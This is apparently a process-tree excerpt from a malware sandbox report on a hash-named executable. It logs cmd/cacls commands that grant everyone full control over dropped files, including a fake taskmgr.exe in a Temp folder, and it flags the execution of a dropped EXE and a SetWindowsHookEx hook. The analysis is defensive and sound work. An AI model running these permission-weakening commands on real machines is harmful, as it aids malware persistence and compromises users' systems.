[level 2] C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
    command line: C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F
-
[level 2] C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 2] C:\Windows\system32\cacls.exe
    command line: cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F
-
[level 2] C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 2] C:\Windows\system32\cacls.exe
    command line: cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F
-
[level 2] C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 2] C:\Windows\system32\cacls.exe
    command line: cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F
-
[level 2] C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
-
[level 2] C:\Windows\system32\cacls.exe
    command line: cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F
-
[level 1] C:\Windows\system32\cmd.EXE
    command line: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
-
[level 2] C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
    command line: C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads